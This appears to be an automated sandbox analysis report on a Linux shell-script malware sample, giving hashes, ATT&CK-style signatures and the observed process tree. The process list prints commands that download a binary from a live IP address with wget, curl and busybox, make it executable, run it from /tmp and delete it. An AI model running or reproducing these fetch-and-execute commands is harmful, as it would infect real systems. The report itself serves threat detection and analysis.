Analysis
max time kernel: 44s
max time network: 131s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
-
Size
10KB
-
MD5
28c4eef7e1bf06ceb5d700dae0b1904f
-
SHA1
8a4772667d8bbf3722d092d56e59e402d2e3e503
-
SHA256
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3
-
SHA512
676f4792c15b78d5d2cab13afd6afca0936a62b130ef8c82785ff6d25875114a96a7316fee523c56633a748dc1e54b1425a99bd11427568faf75526d82fee445
-
SSDEEP
192:lSS5IXtliZl7j5NSFlXO5NSFlVhJtliZlR:lS8IE89w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
/tmp/5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh (PID:1499)
  /bin/rm: /bin/rm bins.sh (PID:1500)
  /usr/bin/wget: wget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1501)
  /usr/bin/curl: curl -O http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1502) - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1503)
  /bin/chmod: chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1507) - File and Directory Permissions Modification
  /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg: ./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1508) - Executes dropped EXE
  /bin/rm: rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg (PID:1509)
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97